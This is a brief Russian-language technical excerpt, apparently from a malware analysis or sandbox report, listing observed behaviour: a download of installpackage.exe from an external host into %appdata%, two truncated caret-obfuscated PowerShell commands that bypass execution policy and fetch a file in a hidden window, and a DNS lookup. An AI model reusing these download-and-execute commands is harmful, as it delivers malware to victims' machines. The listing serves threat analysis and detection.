Техническая информация
- http://onion1.win:443/talisma/installpackage.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^W^ErshE^ll.EXE -E^XeC^uTi^on^PO^L^i^Cy^ bYp^AS^S -Nopr^O^f^iL^e^ -^wINdOw^sTy^le^ hIdD^eN (Ne^W^-^ObJ^ecT SY^sTeM.nET.Webc^l^i^ent).^d^oWNLo^Ad^FilE('http://onion1.win:...
- DNS ASK on##n1.win
- '<SYSTEM32>\cmd.exe' /C "P^o^W^ErshE^ll.EXE -E^XeC^uTi^on^PO^L^i^Cy^ bYp^AS^S -Nopr^O^f^iL^e^ -^wINdOw^sTy^le^ hIdD^eN (Ne^W^-^ObJ^ecT SY^sTeM.nET.Webc^l^i^ent).^d^oWNLo^Ad^FilE('http://onion1.win:... (со скрытым окном)